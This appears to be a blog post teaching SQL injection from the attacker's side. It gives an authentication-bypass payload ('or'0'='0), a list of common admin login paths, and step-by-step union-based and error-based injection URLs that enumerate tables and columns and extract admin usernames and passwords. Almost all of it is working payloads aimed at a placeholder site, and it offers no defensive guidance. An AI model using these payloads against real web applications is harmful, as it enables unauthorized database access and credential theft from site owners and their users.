Welcome To All Readers Of The Mindbenders
SQL Injection
SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.
SQL Injection - 1 Authentication Bypass
Before we jump to the main topic, some basics…
SQL : Structured Query Language
It is meant for the communication between application and the database.
select : select is used to select the data.
insert : insert is used to insert the data.
update : update is used to update the data.
delete : delete is used to delete the data.
Some basic queries with examples
select * from <table name>;
> select * from news;
select <column name> from <table name>;
select news_title from news;
select <col1>, <col2> from <table name>;
> select news_content,news_title from news;
select <col1>, <col2> from <table name> where <col>=<val>;
> select news_content,news_title from news where ID=3;
select * from user_login where uid='<value>' and pass='<value2>';
select * from user_login where uid='name' and pass='password';
select * from admin where admin_id='admin' and pass='admin';
Now instead of password text we can enter this key for authentication bypass
'or'0'='0
The query structure will become
select * from admin where admin_id='admin' and pass=''or'0'='0';
Admin Pages can be somewhat like this,
/admin
/admin.asp
/admin.aspx
/admin.php
/administrator
/administrator.asp
/administrator.aspx
/administrator.php
/user
/user.php
/user.asp
/user.aspx
/login
/login.asp
/login.aspx
/login.php
/Admin
/Admin.asp
/Admin.aspx
/Admin.php
/Administrator
/Administrator.asp
/Administrator.aspx
/Administrator.php
/userlogin
/userlogin.asp
/userlogin.aspx
/userlogin.php
/Adminlogin
/Adminlogin.asp
/Adminlogin.aspx
/Adminlogin.php
/AdminLogin
/AdminLogin.asp
/AdminLogin.aspx
/AdminLogin.php
/newuser
/newuser.asp
/newuser.aspx
/newuser.php
/Newuser
/Newuser.asp
/Newuser.aspx
/Newuser.php
/NewUser
/cms
SQL Injection - 2 Union Based Injection
Again Some Basics,
order by : is used for the sorting purpose.
union : is used to select all the data but it wont repeat the same data.
a = {1,2,3,4}
b = {1,2,3,4,5,6,7}
a U b = {1,2,3,4,5,6,7}
database: is a group of tables.
table : is a group of columns & rows.
column & row : will store the data.
Information Schema: information schema is the information database, the place
that stores information about all the other databases that the MySQL server
maintains. We can access the information by using it‟s objects tables and columns.
information_schema.tables: It contains all the information about the tables.
Information_schema.columns: It contains all the information about the columns
i.e.: db1 (It could provide you information about its own database.)
db2 (It could provide you information about its own database.)
db3 (It could provide you information about its own database.)
But
information_schema will be storing info about all db1,db2,db3
table_name: is used to represent the name of the tables.
column_name: is used to represent the name of the columns.
version(): to see the database version
user(): to see the default user of the database
database(): to see the name of the database
concat() , group_concat(): is used for the concatination purpose.
Step:1 find something=something
i.e. : id=2, catid=5, prod=savita
www.site.com/page.php?id=1
apply '
if it is generating any error, blank page, data missing
> good news for us !!!
> website may be vulnerable.
Step:2 To see the number of columns which are displaying the data.
[ Remove ' ]
note: whatever data we see on the page must be fetched from some database ->
tables -> columns
> and not only 1 column but more than 1 column from different tables must be
displaying the data.
i.e. : www.site.com/page.php?id=1 order by 1 -- || n
www.site.com/page.php?id=1 order by 2 -- || n
www.site.com/page.php?id=1 order by 3 -- || n
www.site.com/page.php?id=1 order by 4 -- || n
www.site.com/page.php?id=1 order by 9 -- || n
www.site.com/page.php?id=1 order by 10 -- || Error
so there are 9 columns which are fetching the data.
Step: 3 To see the visible column
union select will be used.
union select 1,2,3,4,5,6,7,8,9 --
i.e.: www.site.com/page.php?id=1 union select 1,2,3,4,5,6,7,8,9 –
to avoid the by default data
www.site.com/page.php?id=-1 union select 1,2,3,4,5,6,7,8,9 --
step: 4 Get the table names
i.e. : www.site.com/page.php?id=-1 union select 1,table_name,3,4,5,6,7,8,9 from
information_schema.tables --
Admin
Step:5 Get the column names
i.e. : www.site.com/page.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from
information_schema.columns where table_name='admin' --
username
password
Step:6 Get the data.
i.e.: www.site.com/page.php?id=-1 union select 1,password,3,4,5,6,7,8,9 from
admin --
username : admin
password : adminpass
Sometimes, while fetching the columns we may face some error, so we need to
convert table name(string) to ascii.
use: http://easycalculation.com/ascii-hex.php
string: admin
Equivalent Ascii Value : char(97,100,109,105,110)
Sometimes, while fetching the table names, we may see only one table name,
to fetch all the tables we have to use
group_concat(table_name)
sometimes, we may face a situation to count the number of tables, so
count(table_name)
Sometimes, we may need to fetch the name of the tables within the viewsize of the
page.
limit 0,1 -- to see the 1st table name
Sometimes, we need to see username and password all together,
group_concat(user,0x3a,pass) || user:pass
HackBar - add on of firefox
SQL Injection - 3 Error Based Injection
Step: 1 find something=something
i.e.: id=3, catid=3, uid=3 etc etc etc
and apply '
Step: 2 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
table_name from information_schema.tables)) –
Let‟s understand the query.
and 1=convert(int,(select top 1 table_name from information_schema.tables)) –
from this, you have already understood
select top 1 table_name from information_schema.tables
but only top 1 is unfamiliar with you, top 1 will be pointing to the 1 st table name
from the information_schema.tables
Let‟s assume that we got the one name that is “ABCD”
and 1=convert(int,(ABCD)) –
It will try to convert ABCD to the integer. String to Integer conversion is not
possible directly so it will definitely generate an error.
The error will be containing the name of a table.
So, we have got the one table, if we want to fetch the 2nd table then we may need
to
http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1 table_name
from information_schema.tables where table_name not in(„ErrorTable‟))) –
this will display you the 2nd table, to see more tables, you can put the name of the
tables in not in(„ErrorTable1‟,‟ErrorTable2‟)
Step: 3 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorrTable'))
--
Now if we want to fetch the 2nd column name then, the query would be somewhat
like,
http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1'))) –
http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='ErrorTable'
and column_name not in('ErrorColumn1',‟ErrorTable2‟))) –
After finding the table name and the column name we can fetch the data.
Step: 4 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1
ErrorColumnName from ErrorTableName)) --
0 comments:
Post a Comment